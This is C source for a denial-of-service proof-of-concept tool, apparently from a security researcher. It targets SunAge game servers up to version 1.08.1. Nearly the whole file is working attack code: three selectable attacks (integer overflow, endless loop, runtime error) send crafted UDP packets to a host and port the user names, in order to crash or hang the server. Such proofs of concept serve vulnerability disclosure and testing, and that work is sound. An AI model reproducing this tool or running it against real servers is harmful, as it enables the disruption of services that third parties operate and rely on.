/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <time.h>

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define sleep   Sleep
    #define ONESEC  1000
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>

    #define ONESEC  1
#endif

typedef uint8_t     u8;
typedef uint16_t    u16;
typedef uint32_t    u32;



#define VER         "0.1"
#define BUFFSZ      0x3ff6
#define PORT        27960

#define V4P_NICETOMEETYOU               0xF903
#define V4P_MAYINTRODUCEMYSELF          0xF902
#define V4P_MAYINTRODUCEYOURSELF        0xF901
#define V4P_INTRODUCEMETOALLYOURCLIENTS 0xF900
#define V4P_LEAVEOK                     0xF805
#define V4P_S_RESENDPACKAGES            0xF804
#define V4P_S_DUNNO                     0xF803
#define V4P_S_SHUTDOWN                  0xF802
#define V4P_S_JOINOK                    0xF801
#define V4P_SP_REJECTJOIN               0xF800
#define V4P_REJECT                      0xF101
#define V4P_MESSAGE                     0xF100
#define V4P_C_RESENDPACKAGES            0xF003
#define V4P_C_DUNNO                     0xF002
#define V4P_C_LEAVE                     0xF001
#define V4P_C_JOIN                      0xF000



int send_recv(int sd, u8 *in, int insz, u8 *out, int outsz, struct sockaddr_in *peer, int err);
int putxx(u8 *data, u32 num, int bits);
int timeout(int sock, int secs);
u32 resolv(char *host);
void std_err(void);



int main(int argc, char *argv[]) {
    struct  sockaddr_in peer;
    int     sd,
            len,
            pck,
            attack;
    u16     port        = PORT;
    u8      buff[BUFFSZ],
            *p;

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    setbuf(stdout, NULL);

    fputs("\n"
        "Some bugs in SunAge <= 1.08.1 "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 3) {
        printf("\n"
            "Usage: %s <attack> <host> [port(%hu)]\n"
            "\n"
            "Attacks:\n"
            " 1 = integer overflow\n"
            " 2 = endless loop\n"
            " 3 = runtime error\n"
            "\n", argv[0], port);
        exit(1);
    }

    attack = atoi(argv[1]);

    if(argc > 3) port = atoi(argv[3]);
    peer.sin_addr.s_addr = resolv(argv[2]);
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;

    printf("- target   %s : %hu\n", inet_ntoa(peer.sin_addr), ntohs(peer.sin_port));

    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();

    if(attack == 1) {
        p = buff;
        p += putxx(p, 0xff,         8);
        p += putxx(p, 0,            16);
        len = send_recv(sd, buff, p - buff, buff, BUFFSZ, &peer, 1);

    } else if(attack == 2) {
        for(pck = 0; pck <= 2; pck++) {
            p = buff;
            switch(pck) {
                case 0: {
                    p += putxx(p, 0xff,         8);
                    p += putxx(p, V4P_C_JOIN,   16);
                    p += putxx(p, 0,            32);
                    p += putxx(p, 0,            16);
                    break;
                }
                case 1: {
                    p += putxx(p, 0x80,         8);
                    p += putxx(p, V4P_C_JOIN,   16);
                    p += putxx(p, 0,            32);
                    p += putxx(p, 0,            16);
                    break;
                }
                case 2: {
                    p += putxx(p, 0xff,         8);
                    p += putxx(p, 0xe030,       16);
                    p += putxx(p, 0,            16);
                    p += putxx(p, 0,            16);
                    p += putxx(p, 0,            16);
                    break;
                }
                default: break;
            }

            len = send_recv(sd, buff, p - buff, buff, BUFFSZ, &peer, 1);
        }

    } else if(attack == 3) {
        for(pck = 0; pck <= 2; pck++) {
            p = buff;
            switch(pck) {
                case 0: {
                    p += putxx(p, 0xff,         8);
                    p += putxx(p, V4P_C_JOIN,   16);
                    p += putxx(p, 0,            32);
                    p += putxx(p, 0,            16);
                    break;
                }
                case 1: {
                    p += putxx(p, 0x80,         8);
                    p += putxx(p, V4P_C_JOIN,   16);
                    p += putxx(p, 0,            32);
                    p += putxx(p, 0,            16);
                    break;
                }
                case 2: {
                    p += putxx(p, 0x80,         8);
                    p += putxx(p, 0xe030,       16);
                    p += putxx(p, 0,            16);
                    p += sprintf(p, "%s", "nickname") + 1;
                    break;
                }
                default: break;
            }

            len = send_recv(sd, buff, p - buff, buff, BUFFSZ, &peer, 1);
        }
    }

    close(sd);
    return(0);
}



int send_recv(int sd, u8 *in, int insz, u8 *out, int outsz, struct sockaddr_in *peer, int err) {
    int     retry = 2,
            len;

    if(in) {
        while(retry--) {
            fputc('.', stdout);
            if(sendto(sd, in, insz, 0, (struct sockaddr *)peer, sizeof(struct sockaddr_in))
              < 0) goto quit;
            if(!out) return(0);
            if(!timeout(sd, 1)) break;
        }
    } else {
        if(timeout(sd, 3) < 0) retry = -1;
    }

    if(retry < 0) {
        if(!err) return(-1);
        printf("\nError: socket timeout, no reply received\n\n");
        exit(1);
    }

    fputc('.', stdout);
    len = recvfrom(sd, out, outsz, 0, NULL, NULL);
    if(len < 0) goto quit;
    return(len);
quit:
    if(err) std_err();
    return(-1);
}



int putxx(u8 *data, u32 num, int bits) {
    int     i,
            bytes;

    bytes = bits >> 3;
    for(i = 0; i < bytes; i++) {
        data[i] = (num >> (i << 3)) & 0xff;
    }
    return(bytes);
}



int timeout(int sock, int secs) {
    struct  timeval tout;
    fd_set  fd_read;

    tout.tv_sec  = secs;
    tout.tv_usec = 0;
    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    if(select(sock + 1, &fd_read, NULL, NULL, &tout)
      <= 0) return(-1);
    return(0);
}



u32 resolv(char *host) {
    struct  hostent *hp;
    u32     host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u32 *)hp->h_addr;
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


